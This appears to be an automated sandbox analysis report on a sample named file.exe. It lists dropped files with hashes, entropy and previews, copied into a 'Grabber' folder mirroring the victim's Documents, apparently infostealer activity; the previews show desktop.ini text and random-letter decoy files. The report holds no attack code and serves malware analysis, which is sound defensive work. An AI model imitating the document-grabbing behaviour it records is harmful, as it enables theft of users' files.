                                                                                                                                                            C:\Users\user\AppData\Local\1748642afea85b545bfef23bd04430d7\user@116938_en-US\Grabber\DRIVE-C\Users\user\Documents\My Pictures\Camera Roll\desktop.ini

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):190
                                                                                                                                                            Entropy (8bit):3.5497401529130053
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:QJ8ql62fEilSl7lA5wXdUSlAOlRXKQlcl5lWGlyHk15ltB+SliLlyQOnJpJSl6nM:QyqRsioTA5wmHOlRaQmZWGokJD+SkLOy
                                                                                                                                                            MD5:D48FCE44E0F298E5DB52FD5894502727
                                                                                                                                                            SHA1:FCE1E65756138A3CA4EAAF8F7642867205B44897
                                                                                                                                                            SHA-256:231A08CABA1F9BA9F14BD3E46834288F3C351079FCEDDA15E391B724AC0C7EA8
                                                                                                                                                            SHA-512:A1C0378DB4E6DAC9A8638586F6797BAD877769D76334B976779CD90324029D755FB466260EF27BD1E7F9FDF97696CD8CD1318377970A1B5BF340EFB12A4FEB4A
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:......[...S.h.e.l.l.C.l.a.s.s.I.n.f.o.].....L.o.c.a.l.i.z.e.d.R.e.s.o.u.r.c.e.N.a.m.e.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.w.i.n.d.o.w.s...s.t.o.r.a.g.e...d.l.l.,.-.2.1.8.2.4.....

                                                                                                                                                            C:\Users\user\AppData\Local\1748642afea85b545bfef23bd04430d7\user@116938_en-US\Grabber\DRIVE-C\Users\user\Documents\My Pictures\desktop.ini

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):504
                                                                                                                                                            Entropy (8bit):3.514398793376306
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:12:QZsiL5wmHOlDmo0qmalDmo0qmN4clLwr2FlDmo0IWFSklrgl2FlDmo0qjKA1:QCGwv4o0u4o0RhlLwiF4o0HUsF4o01A1
                                                                                                                                                            MD5:29EAE335B77F438E05594D86A6CA22FF
                                                                                                                                                            SHA1:D62CCC830C249DE6B6532381B4C16A5F17F95D89
                                                                                                                                                            SHA-256:88856962CEF670C087EDA4E07D8F78465BEEABB6143B96BD90F884A80AF925B4
                                                                                                                                                            SHA-512:5D2D05403B39675B9A751C8EED4F86BE58CB12431AFEC56946581CB116B9AE1014AB9334082740BE5B4DE4A25E190FE76DE071EF1B9074186781477919EB3C17
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:......[...S.h.e.l.l.C.l.a.s.s.I.n.f.o.].....L.o.c.a.l.i.z.e.d.R.e.s.o.u.r.c.e.N.a.m.e.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.7.9.....I.n.f.o.T.i.p.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.,.-.1.2.6.8.8.....I.c.o.n.R.e.s.o.u.r.c.e.=.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.i.m.a.g.e.r.e.s...d.l.l.,.-.1.1.3.....I.c.o.n.F.i.l.e.=.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.....I.c.o.n.I.n.d.e.x.=.-.2.3.6.....

                                                                                                                                                            C:\Users\user\AppData\Local\1748642afea85b545bfef23bd04430d7\user@116938_en-US\Grabber\DRIVE-C\Users\user\Documents\My Videos\desktop.ini

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):504
                                                                                                                                                            Entropy (8bit):3.5218877566914193
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:12:QZsiL5wmHOlDmo0qmclDmo0qmJclLwr2FlDmo0IWVvklrgl2FlDmo0qjKArn:QCGwv4o0o4o0mlLwiF4o090UsF4o01Ar
                                                                                                                                                            MD5:50A956778107A4272AAE83C86ECE77CB
                                                                                                                                                            SHA1:10BCE7EA45077C0BAAB055E0602EEF787DBA735E
                                                                                                                                                            SHA-256:B287B639F6EDD612F414CAF000C12BA0555ADB3A2643230CBDD5AF4053284978
                                                                                                                                                            SHA-512:D1DF6BDC871CACBC776AC8152A76E331D2F1D905A50D9D358C7BF9ED7C5CBB510C9D52D6958B071E5BCBA7C5117FC8F9729FE51724E82CC45F6B7B5AFE5ED51A
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:......[...S.h.e.l.l.C.l.a.s.s.I.n.f.o.].....L.o.c.a.l.i.z.e.d.R.e.s.o.u.r.c.e.N.a.m.e.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.9.1.....I.n.f.o.T.i.p.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.,.-.1.2.6.9.0.....I.c.o.n.R.e.s.o.u.r.c.e.=.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.i.m.a.g.e.r.e.s...d.l.l.,.-.1.8.9.....I.c.o.n.F.i.l.e.=.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.....I.c.o.n.I.n.d.e.x.=.-.2.3.8.....

                                                                                                                                                            C:\Users\user\AppData\Local\1748642afea85b545bfef23bd04430d7\user@116938_en-US\Grabber\DRIVE-C\Users\user\Documents\NIRMEKAMZH.jpg

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1026
                                                                                                                                                            Entropy (8bit):4.694574194309462
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:57msLju1di6quBsK4eI3+RkAjyMKtB/kS0G1:gmjuC1uBsNeAokAUB/GE
                                                                                                                                                            MD5:78801AF1375CDD81ED0CC275FE562870
                                                                                                                                                            SHA1:8ED80B60849A4665F11E20DE225B9ACB1F88D5A9
                                                                                                                                                            SHA-256:44BF2D71E854D09660542648F4B41BC00C70ABA36B4C8FD76F9A8D8AB23B5276
                                                                                                                                                            SHA-512:E20D16EC40FEF1A83DB1FC39A84B691870C30590FC70CA38CC83A8F08C08F626E3136ADBF3B731F85E5768561C8829C42DF3B97C726191FEF3859272A03E99E0
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:NIRMEKAMZHIQPCHHYDLDLONNDCJFTRECXCDYNWSMACINEWVUDRAWELIDKGUGOSLGTIKNJSPGIFRTNFPWDBIHISPKHOBWBMPRCMOQQAVOUVQODKWHOMRFLDKYATGCKZVKRHTCMHJJGYWRTELTQOLJXKPKLCWLNKOQBPNOJHARBPHMNOZRAICCUCIEHOFBKAUBHQNVPQAWMIZZGYXPDVFFYAGVHCILYWHPIYXMHCXNZJBHOBSYJEJJTXWKIBAQBZGNDHAWRNDJBFGUEFMOHHHXTBQHMIBGPLFFGAEFCSIDIGIIDPUHNETSAWPCSJJCDZPMLCWGKVYJOMJWFUXHEQSIPJDTRUPSCBCTYFLTMLRFJUXIBNGXSREQTWHFPIDSKBRTLLRUTFDXFIDFUXMZCFABRMLSHWFSZTZUJRPKXKHBWYAPJLBFVPDCCGSQYVSJDWWNYUXGFFAMCEWZRCITRTQVISLFKGNMRYVUJTQWJUFSLPGOANDHPJXZJWSWQJJZLPACFDBTCFPQMXOVHIOAMCIQCTLIBSRXETYYSVLPHVURWFAJBQPHFKWZOFSUIKXWOHPOJGFCCQGRXFMTCKHSWJPWBLFTLVERFEAFHASTRMUQSDEUNXGDSWWTOQTUBAZVNLXDRFCZWKUVIGVXHTLERNSTFJCPGLHSIFYNUWMACSMFBHFDCZSOPZRKQGTETMPYNUQPOTCKDJQXQUUMEWVKVIEYDAEXLRTMQQSTAVCIBCOSHDMRFFHIAQDBBMBEOMTPGHKJIAYMKMTMXYUVORUJUGSHEHFCYZUALULRJGKXINMJWUWMPZOJOUMUEFFWCKOWNLIEVQWZPJMTQVIEDAFICXPPSUGBPZSMHDQOIXNDWLCSVZUHTSHAPPFDAEETYFLSNJFPXRPZYQLZLSJQALWIOEGAOFDHHNAOIWCTFHXKZJROQRTVBGVHJKRUCGBHKRLCZODATMBGLOISTFOETTXPJOPGPPJYNFXWQFALNGZLGZVJ

                                                                                                                                                            C:\Users\user\AppData\Local\1748642afea85b545bfef23bd04430d7\user@116938_en-US\Grabber\DRIVE-C\Users\user\Documents\NIRMEKAMZH.xlsx

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1026
                                                                                                                                                            Entropy (8bit):4.694574194309462
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:57msLju1di6quBsK4eI3+RkAjyMKtB/kS0G1:gmjuC1uBsNeAokAUB/GE
                                                                                                                                                            MD5:78801AF1375CDD81ED0CC275FE562870
                                                                                                                                                            SHA1:8ED80B60849A4665F11E20DE225B9ACB1F88D5A9
                                                                                                                                                            SHA-256:44BF2D71E854D09660542648F4B41BC00C70ABA36B4C8FD76F9A8D8AB23B5276
                                                                                                                                                            SHA-512:E20D16EC40FEF1A83DB1FC39A84B691870C30590FC70CA38CC83A8F08C08F626E3136ADBF3B731F85E5768561C8829C42DF3B97C726191FEF3859272A03E99E0
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:NIRMEKAMZHIQPCHHYDLDLONNDCJFTRECXCDYNWSMACINEWVUDRAWELIDKGUGOSLGTIKNJSPGIFRTNFPWDBIHISPKHOBWBMPRCMOQQAVOUVQODKWHOMRFLDKYATGCKZVKRHTCMHJJGYWRTELTQOLJXKPKLCWLNKOQBPNOJHARBPHMNOZRAICCUCIEHOFBKAUBHQNVPQAWMIZZGYXPDVFFYAGVHCILYWHPIYXMHCXNZJBHOBSYJEJJTXWKIBAQBZGNDHAWRNDJBFGUEFMOHHHXTBQHMIBGPLFFGAEFCSIDIGIIDPUHNETSAWPCSJJCDZPMLCWGKVYJOMJWFUXHEQSIPJDTRUPSCBCTYFLTMLRFJUXIBNGXSREQTWHFPIDSKBRTLLRUTFDXFIDFUXMZCFABRMLSHWFSZTZUJRPKXKHBWYAPJLBFVPDCCGSQYVSJDWWNYUXGFFAMCEWZRCITRTQVISLFKGNMRYVUJTQWJUFSLPGOANDHPJXZJWSWQJJZLPACFDBTCFPQMXOVHIOAMCIQCTLIBSRXETYYSVLPHVURWFAJBQPHFKWZOFSUIKXWOHPOJGFCCQGRXFMTCKHSWJPWBLFTLVERFEAFHASTRMUQSDEUNXGDSWWTOQTUBAZVNLXDRFCZWKUVIGVXHTLERNSTFJCPGLHSIFYNUWMACSMFBHFDCZSOPZRKQGTETMPYNUQPOTCKDJQXQUUMEWVKVIEYDAEXLRTMQQSTAVCIBCOSHDMRFFHIAQDBBMBEOMTPGHKJIAYMKMTMXYUVORUJUGSHEHFCYZUALULRJGKXINMJWUWMPZOJOUMUEFFWCKOWNLIEVQWZPJMTQVIEDAFICXPPSUGBPZSMHDQOIXNDWLCSVZUHTSHAPPFDAEETYFLSNJFPXRPZYQLZLSJQALWIOEGAOFDHHNAOIWCTFHXKZJROQRTVBGVHJKRUCGBHKRLCZODATMBGLOISTFOETTXPJOPGPPJYNFXWQFALNGZLGZVJ

                                                                                                                                                            C:\Users\user\AppData\Local\1748642afea85b545bfef23bd04430d7\user@116938_en-US\Grabber\DRIVE-C\Users\user\Documents\PWZOQIFCAN.pdf

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1026
                                                                                                                                                            Entropy (8bit):4.695900624002646
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:12:55kzf0ILfo2TdftHFyQ9yi5pS2+w9gHtKgqin5q+GzA0Kb08Vb5nY1NLIeukWg/w:56zcILlTxtX9j5TijGzVURS5IBgSGVny
                                                                                                                                                            MD5:BC4419B8B9970FEDCD704610C64179B0
                                                                                                                                                            SHA1:71BD107584E1CFC5E5E75F765C064FC13228BC96
                                                                                                                                                            SHA-256:A2115F382834559DCAB7139CB455FEFBEBBF07B89E2B4B8CFA3DC152491DAC1F
                                                                                                                                                            SHA-512:454E3C24F975C0F56F152D24D32C544918CC7663B01CC50C717FAD082B201D4265DA9C5808AFA58573BC104AB739330AEAD49156FA7E7419B3D7CE130EAF3142
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:PWZOQIFCANBQJPWANKEGOVMEWCFFLEMZUVJQOAQAXGCTWZTWYUTVQQWHVDWHRFTNLRYVNIIZGTGOYHBWUXFUJYWYCZRMHOWCZUBHGWNSMDGQIDGAHRDCIIAVORACBTBRHJNIBWQWQCOIRDJVGLMDNVRGTPPKQFQIFZZUCPJOKPUOXSLQIOBEKHODJTILUMNILLOSWDYCRTPWNPHXZSIAIJKAJTPYTYBSZZXRMUJHEQKDIDPVCZFDCTZVNAOYHSQJIJCWEYINXRRNANLPHUEMCLBTQNKFXRNDFJSUGZSSZUNTRNIONZRKWLCPJJQIACLJRBWZWPPPYJBUFAPIIHMQCTYHBSEEDXNTHPLWQREXFJXBUHCFLIGJQMAKBUMLPAYETALQAGUXNUAYOOFWKCXOAFADMANFEKSMOMEUZZFFPVSMHLOYRHXJRRAJALQVRIPUMMCCTGEVBPFLMLHCUGHBKDAURARQMEAWSQWOEBWEPWRBOUUAYHFAMWPSLAHUCSHDTXVLAVOAPCJJOBGMTOASVLNTADXOSSNCBIQVQFWDQSOVWWEBSZHOUAWBRJTVEBGJZEWIEYONXLCRVUQSPXKKPFJIUUWJMLGZBROUKKZUPWGOUIGYNFESGKBBHDAQFXCOZMLVFRUCCOPOYCHAFADUTZZFJYKNDQVJBTYSEVUHBFRNMKFNLBLTGEBDFOSOUEGYXVCXFUPTCVGNVFDGPBRNRCMUVADFIZDQITOTSQQNGGDMNJWJTVAKLEFUUJBLMKOVXJNLWUOGSIVLILHQAZSXDLYYVDPHGSRAAYZOADQUOKQJOANLTVTRHVTUTVJTLAQTNSTQOAIWGJAUNLGKTGFSZYKOTDQQLCHNAGGJECKGDNKFKBCFITQOVNMOIZLXAGNUBDQXAGJBSLDBFKOBLLWCHJAPFBBKFXQCXWXHIIQWQFYRIZJGDPOSSOCUECDWDQBRDSTMSCNGFBWWIQKBSVUPZMODDPXNVVXBEEMTHIHG

                                                                                                                                                            C:\Users\user\AppData\Local\1748642afea85b545bfef23bd04430d7\user@116938_en-US\Grabber\DRIVE-C\Users\user\Documents\QFAPOWPAFG.docx

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1026
                                                                                                                                                            Entropy (8bit):4.690474000177721
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:2OgtZqoLtXCKESzKP+tziBUswJwLVk9zxY/tks7VMejXhggCon:cLtXZEmKPopswJEqxUkp82an
                                                                                                                                                            MD5:A01E6B89B2F69F2DA25CB28751A6261C
                                                                                                                                                            SHA1:48C11C0BECEB053F3DB16EC43135B20360E77E9B
                                                                                                                                                            SHA-256:0D0EB85E2964B5DDA19C78D11B536C72544AE51B09DBEC26E70C69ADDC7E9AA5
                                                                                                                                                            SHA-512:1E335E567B7F959E7524E532E257FBC0A21818BDCE0B909F83CBBCE8013FA61A8D665D7DED0982F87B29A5A786A0EE7129792A1B2D48DD205180569D9E919059
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:QFAPOWPAFGZUMXROWPODMNAMXJGGULHBVFMBDFCUTBDPEHPYKVYAURAEPYZMHPBECXOGPOKPNMKAIBYHBFNFVWPHHZFRFVAYYHSJZJTHAYESIKJCXVOVANTTAMQKCXEHJRYFSWGEELTALODIPFLWFILANHAGQENMCPNFLPAJIPRNZRAIETALHZECBIKVUBLJMHNYJXPSAMZZCVZQOHLATXYVRZQROYHFKLVOJLGRAGXLMXJHKHSSCTHDFNSLOUEZPTFGVVVGCDIXIBWQFIIFACZAYUUQZJRKZXJQPLVPFTJAMSPRDIBBPPFLUCOUPPQDSFKQXMEIFUXXAGKAWLWJPNBHZSGIAFFXPBLRMFNGMVBEWTTPFJEHMXLOZWQHEHGWBXCAMZISSZMPHUOREQDUTUEPDVLBWTFCJIFAGQOEHFIMLTDTDLYPEQZDZBBZYMKXTUKVCEROFCABVNAQXVLLCCNLEOGKLFPVSGMNNQZHFNCWNPGBCLLMTYKZMJSUDIPHSUQJQTOTICLSMQNHYJAQTVXMEZAEGNBGADHUJNJLQZSSGWRLYBWJEOTERXWRTICIVUFNKHRUSWRGABWPZDFTGSDASOKXSFUGVBUISDQNJUAOCSOANZFXTFQGDKEKGZJRMJMGTAJCTJEOCZCUZMUYKAKZZQYDRJXWZWMOXQQLWJMWAENIFMHJXMELOZTVHRLQZNWCBXKEBNUBDDOFYHNWIPPRWGDZCQLMHAOLYZIDJJXAASOVDNHNMDDCIWFPIOLQHWQCPUVUZUDVOKBMFLALCZEQWJAKTVUUDROHEKJKHQBLQZNVWSNNZFKMZLQPFYUYHNCDTCBVUUNKNZIORBFTFVKLHZTQAPWVKTTZFCTHJBBWQMZTFKADJIZZANUOLLRBSVTUCNIJWDQPYHEPWEUTFVNOACOFURIPTLDGJUOYFJRHAUIQREUKUSADZYOEDEDZRKKPKLFLFQIMMIKLOCTSOFOEZYVAGMCITCUWAOUT

                                                                                                                                                            C:\Users\user\AppData\Local\1748642afea85b545bfef23bd04430d7\user@116938_en-US\Grabber\DRIVE-C\Users\user\Documents\QFAPOWPAFG.pdf

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1026
                                                                                                                                                            Entropy (8bit):4.690474000177721
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:2OgtZqoLtXCKESzKP+tziBUswJwLVk9zxY/tks7VMejXhggCon:cLtXZEmKPopswJEqxUkp82an
                                                                                                                                                            MD5:A01E6B89B2F69F2DA25CB28751A6261C
                                                                                                                                                            SHA1:48C11C0BECEB053F3DB16EC43135B20360E77E9B
                                                                                                                                                            SHA-256:0D0EB85E2964B5DDA19C78D11B536C72544AE51B09DBEC26E70C69ADDC7E9AA5
                                                                                                                                                            SHA-512:1E335E567B7F959E7524E532E257FBC0A21818BDCE0B909F83CBBCE8013FA61A8D665D7DED0982F87B29A5A786A0EE7129792A1B2D48DD205180569D9E919059
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:QFAPOWPAFGZUMXROWPODMNAMXJGGULHBVFMBDFCUTBDPEHPYKVYAURAEPYZMHPBECXOGPOKPNMKAIBYHBFNFVWPHHZFRFVAYYHSJZJTHAYESIKJCXVOVANTTAMQKCXEHJRYFSWGEELTALODIPFLWFILANHAGQENMCPNFLPAJIPRNZRAIETALHZECBIKVUBLJMHNYJXPSAMZZCVZQOHLATXYVRZQROYHFKLVOJLGRAGXLMXJHKHSSCTHDFNSLOUEZPTFGVVVGCDIXIBWQFIIFACZAYUUQZJRKZXJQPLVPFTJAMSPRDIBBPPFLUCOUPPQDSFKQXMEIFUXXAGKAWLWJPNBHZSGIAFFXPBLRMFNGMVBEWTTPFJEHMXLOZWQHEHGWBXCAMZISSZMPHUOREQDUTUEPDVLBWTFCJIFAGQOEHFIMLTDTDLYPEQZDZBBZYMKXTUKVCEROFCABVNAQXVLLCCNLEOGKLFPVSGMNNQZHFNCWNPGBCLLMTYKZMJSUDIPHSUQJQTOTICLSMQNHYJAQTVXMEZAEGNBGADHUJNJLQZSSGWRLYBWJEOTERXWRTICIVUFNKHRUSWRGABWPZDFTGSDASOKXSFUGVBUISDQNJUAOCSOANZFXTFQGDKEKGZJRMJMGTAJCTJEOCZCUZMUYKAKZZQYDRJXWZWMOXQQLWJMWAENIFMHJXMELOZTVHRLQZNWCBXKEBNUBDDOFYHNWIPPRWGDZCQLMHAOLYZIDJJXAASOVDNHNMDDCIWFPIOLQHWQCPUVUZUDVOKBMFLALCZEQWJAKTVUUDROHEKJKHQBLQZNVWSNNZFKMZLQPFYUYHNCDTCBVUUNKNZIORBFTFVKLHZTQAPWVKTTZFCTHJBBWQMZTFKADJIZZANUOLLRBSVTUCNIJWDQPYHEPWEUTFVNOACOFURIPTLDGJUOYFJRHAUIQREUKUSADZYOEDEDZRKKPKLFLFQIMMIKLOCTSOFOEZYVAGMCITCUWAOUT

                                                                                                                                                            C:\Users\user\AppData\Local\1748642afea85b545bfef23bd04430d7\user@116938_en-US\Grabber\DRIVE-C\Users\user\Documents\QFAPOWPAFG\BQJUWOYRTO.png

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1026
                                                                                                                                                            Entropy (8bit):4.68639364218091
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:P4r5D4QctcBd3LMDzR8JwOlGpXSmDbvy5z5hu/KBdAmHtTQ:P49StmdbMfR8ApSmnvyXhuCBd3ts
                                                                                                                                                            MD5:1D78D2A3ECD9D04123657778C8317C4E
                                                                                                                                                            SHA1:3FAA27B9C738170AEE603EFAE9E455CA459EC1B7
                                                                                                                                                            SHA-256:88D5FF8529480476CA72191A785B1CCDB8A5535594C125AF253823DD2DC0820E
                                                                                                                                                            SHA-512:7EA58B30CB5FDA1C4D71DC65DF64FD9703E81DDCBAD9DA5B405CBBEACB9197A6E8B933C844289D7852801B6A5BC545C4234DD69E85F0AF640F5BC51BE5DDA12E
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:BQJUWOYRTOLXZEKCXDLSWRNMFMCSYXRPFWPCFOMLTXRLOYSWDYNKGJBBEKHPTUBSJDZWIUKDQVTQQAEIJPJKOPTWULSKKXLSOLVYRREVXVSZLFQQBXKKCMYLLBRWPJMBHNBFTQUBUPFYXLIARNGQLIDNRZYVXHIWZXDZUYNJJXBTDFJWBKWCQQGPRFDTAZULKSSEFZTUDJOKODZLAIWAICBXNPXUMZFRUVBQDJIENEPBRWTDBODAVKDNOLRNYNBKKQBPGBUTIJCMZXSCKDRZIHJDDUPOXQOJQXAOMBHVIUUZBSRKPYCRBAHBBGKXGMODRWMTAMVEFAPKYMHWCUCKKJSLQYPIMPYZKZKPIXSZAPTLQLZGQHTXZBXONOWDVDWQMPDILYOIVFKXBUSTSFUGKZZBFUUTDDOMVPOINIMBFTSGRRDLSLPUXATPQGHCHIJRAGXNYBQOTZSNMAZCEDHOUMBJWJSCXGDMRQCIYNBQTBGKDTCTKRJCRXWGYTZRFYVOFBTBDYLRCDVRFBCHFMPWSBHHWRRLBRKCLDQRSMCLVZAGFMWLPHYJGALXNLZXJVWWXBFHYIZDZFXDBTHZKRDQBGOXOULNHYYUXXATXCLPLWIUBSSSLNJBTSMXAWVUVUVKDAOHXCIVGHJLVIETMJMFWUZTFVNALCFBKNUVWGXUEPDHVHGOBZRVOPDFCORECRQJIXMUFIACDLBMTHCLLXOISHLMFTEBKUAICYBSNGCASKNQBLIPLSIPNJTWJLGARSXDGLOKVQSUASJSIRFNLKQTPVOVXSGKMXEEUVWMULGSMRQRMICWPXBVELHRSUIIUSGMSRWNPMSLNFKZWDRGGAVGKNPMSZMHRWAKTDXUHZPMIYCRABYQLAAVOSTLMEJGFHJSMBRQBEICTCXKKZHNUWSZMQZHAMPRHAWDVATODUFFRHCHJYGQZNMBWVRFZTJLSUUUMCUEOZEUMCJAOLHOIJTNPLJBASLIHCUCMVTUNIOK

                                                                                                                                                            C:\Users\user\AppData\Local\1748642afea85b545bfef23bd04430d7\user@116938_en-US\Grabber\DRIVE-C\Users\user\Documents\QFAPOWPAFG\HQJBRDYKDE.xlsx

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1026
                                                                                                                                                            Entropy (8bit):4.691179545447335
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:tlYQ6oxCx5XYY3KvUEOIA65F7dAeIQGhrMerXo:rxy5avIgDIQQrMQXo
                                                                                                                                                            MD5:70ED9F89ADEE0C43C2C82F30F075991E
                                                                                                                                                            SHA1:0E75067F3EEBF7D577813A06A0A6A2FA9640A04F
                                                                                                                                                            SHA-256:4CCB14AF416B302962BC020D9E436FCA0B32B56F37932B2CA7D078355282CF80
                                                                                                                                                            SHA-512:A75A2B3BE722735CE45B93CB1522F31D884BA8BE30A122BFCE7E50720773B0B5B48F163BB9FF0239015430BEADD61DAD76F13EA6CC027C5A4AB4B842EED468CB
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:HQJBRDYKDEOHXEMHQUWMHZKQTIUMQUJZQSHSNBAZYZJDQYWUPMZFOTGKPEFSZCMKVLFONSCAAMYVGLIHZYOTOPUUVQOBDOLNPVUWURWNEXALCBEMRUAMWIVXUEMKBDPTQDMNCZDHIBPXPQNVVBSEAMAZGUFIOXJXUMQDPOKVVJUQBWZVZRBRPTZPVEJYLPIYMEAMWWDBNMSHJABGSBWULRADLUGOSJMUMMAMATXWORDUBFFRKPJOGISDLVVWVEVKTCLPSYFZVEZUCAYZDFGQESZIGEIJSPECVLABTLKSYGZSZGOCSOVUTVVPDTKMXTQIDAXVAJZEADSIEJVOWEHIMAOXMXIYKZIBMQKEOKXDOHFZWHLAGEWJECAZGRNZINNBMFSXKSHESCTAUQMEPBTLUPWEJFSFLHXHTECHZUUDFJOGDDWIRGOWPPKFZEUJYTJMHKZKHJNTGRKLLEAGPHTTOOTTMGEBMEHXZJPZXSVAQMYTVIDQEYRXIAPROXUHUUXYGMHCRUUYFQOWDUPJKUNGSADHWGBZUQMPTWLBUXNFUJGXUJHMMUUHZIKPUPRZVXNDGTJDDXIMANOVZFNWWEHJHXRQXSYDNXTPEXJZNKPPCJBVRMLFMRIEWFPGJGVBHZKCGUUQFRCXDGAPMAVRPRODGVOWMFUTKARIMTYBKFAHZMPYXRSLUFTYOWQDSLXVKMYYISNNZDBQEVANDLZJURRLNHZBMEVGPOIXUCEKJTTUZSEQSNPEEYVXCUAWHUWEFITOITMDHBLUWCIANEGYREWEOVBZRHQTHBYYPFCKKGLXQPBHRRMJUHMZXPSZSYQISKTCKOCWTTRZHBQSMTMNCYCQKIGYNDYWGUIVILQUURMKJKQBBDUZOINKPJRQEGWTTZOFXCCZXUCHKCWUSBTKAOSTDEHMZTFHPRMNWUWUKXNTZRKJRQLXXQCEGZPAHKOBVMNQQIYGWKFTHIVTFKISEBNGTEJIXPIRDTAGJZNJKNLM

                                                                                                                                                            C:\Users\user\AppData\Local\1748642afea85b545bfef23bd04430d7\user@116938_en-US\Grabber\DRIVE-C\Users\user\Documents\QFAPOWPAFG\LHEPQPGEWF.pdf

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1026
                                                                                                                                                            Entropy (8bit):4.694579526837108
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:9mugycA/B3wI1sZj9s/A0ikL8GO/M81cJzg+S+fBXOQklGKJx3:9mk53zsZj9s/okLklcJs+SOXlkEKJx3
                                                                                                                                                            MD5:2DB1C5AA015E3F413D41884AC02B89BC
                                                                                                                                                            SHA1:4872ADF2EA66D90FC5B417E4698CFF3E9A247E7B
                                                                                                                                                            SHA-256:956C48539B32DB34EE3DAF968CC43EA462EE5622B66E3A7CB8705762EB0662F1
                                                                                                                                                            SHA-512:C80222D65C3287D0A2FB5EB44A59737BC748C95ECDF14350A880CD653D3C39E7B47543AAE9C0CC541A16347E6E4217FB45DF4C96381D5BD820556186ED48B790
                                                                                                                                                            Malicious:false
